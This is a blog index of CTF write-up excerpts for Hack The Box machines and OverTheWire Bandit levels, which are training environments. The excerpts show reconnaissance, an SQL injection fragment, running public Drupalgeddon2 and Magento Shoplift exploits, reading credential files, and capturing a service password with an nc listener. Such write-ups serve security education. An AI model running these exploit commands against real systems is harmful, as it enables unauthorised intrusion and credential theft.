CTFs

HTB Pennyworth

We continue with another very easy HTB box. $ nmap -p- 10.129.243.77 -sV –min-rate 5000 Here we have a Jetty Jetty 9.4.39.v20210325 Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/ If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

HTB Bike

This is another of the HTB Starting Point’s very easy boxes. $ nmap -v -p- -sV 10.129.237.207 –min-rate 5000 Access to http://10.129.237.207/ According to the Nmap scan, the site runs under node.jsWappalyzer describes the Web Framework as Express. There is no email address control checking of the input: In fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

HTB Ignition

This is another of the Very easy HTB Starting Point boxes. $ sudo nano /etc/hosts $ nmap -p- -A 10.129.232.211 -sV Access to http://ignition.htb/ $ dirsearch -u http://ignition.htb -i 200 Access to http://ignition.htb/admin/ Based on HTB questions, the username is admin. As there is a form_key parameter it’s most difficult to brute-force.So, we can try then to guess manually the password using the most usual passwords. We can find more

HTB Redeemer

This is one of the starting point HTB boxes.It is rated as a very easy and only have 1 flag. $ nmap -p- -A 10.129.216.146 –min-rate 5000 So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 –min-rate 5000 Site inspection: http://10.10.10.233/ $ whatweb http://10.10.10.233 We are facing a Drupal 7 CMS. $ dirsearch -u http://10.10.10.233/ -i 200 http://10.10.10.233/includes/bootstrap.inc Specifically, it is a Drupal v7.56. Let’s see if this Drupal version has some vulnerability. CVE-2018-7600https://github.com/dreadlocked/Drupalgeddon2 $ git clone https://github.com/dreadlocked/Drupalgeddon2.git$ ruby drupalgeddon2.rb http://10.10.10.233 armageddon.htb>> whoami armageddon.htb>> pwd armageddon.htb>> ls /var/www/html/sites -la armageddon.htb>> ls /var/www/html/sites/default -la armageddon.htb>> cat /var/www/html/sites/default/settings.php Mysql password = CQHEy@9M*m23gBVj

HTB GoodGames

$ nmap -sV -p- goodgames.htb –min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ‘, we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don’t have credentials for this site, but as we’ve confirmed there is an sql injection let’s try to exploit it. First, we need to know how many columns exist. email=admin%40test.com’ union all

HTB Swagshop

$ nmap -p- -sV 10.10.10.140 $sudo nano /etc/hosts Access to http://swagshop.htb/ As we are facing a Magento, we can use Magescan to check it. $ wget https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar $ php magescan.phar scan:all http://swagshop.htb From the magescan report, if we find about patches, the first one is SUPEE-5344. https://magento.com/security/patches/supee-5344-%E2%80%93-shoplift-bug-patchhttps://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.htmlhttps://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py With this poc, you should be able to add an admin user. $ python3 poc.py swagshop.htb Access to http://swagshop.htb/index.php/admin The “Froghopper” Attack After

HTB Return

$ nmap -sV -p- 10.10.11.108 -Pn –min-rate 5000 http://10.10.11.108/ http://10.10.11.108/settings.php If we add our IP into the Server Address field: $ sudo nc -lvnp 389 We get a connection and the svc-printer password. svc-printer:1edFg43012!! You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Bandit CTF – Level 23

Level 22 -> 23 bandit22@bandit:~$ cd /etc/cron.dbandit22@bandit:/etc/cron.d$ ls bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23 bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh bandit22@bandit:/etc/cron.d$ whoami bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ‘ ‘ -f 1 bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349 password = jc1uXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 22

Level 21 -> 22 bandit21@bandit:/etc/cron.d$ ls bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22 bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh bandit21@bandit:/tmp$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv Password = Yk7oXXXXXXXXXXXXXXXXXXXXXXXXXXXX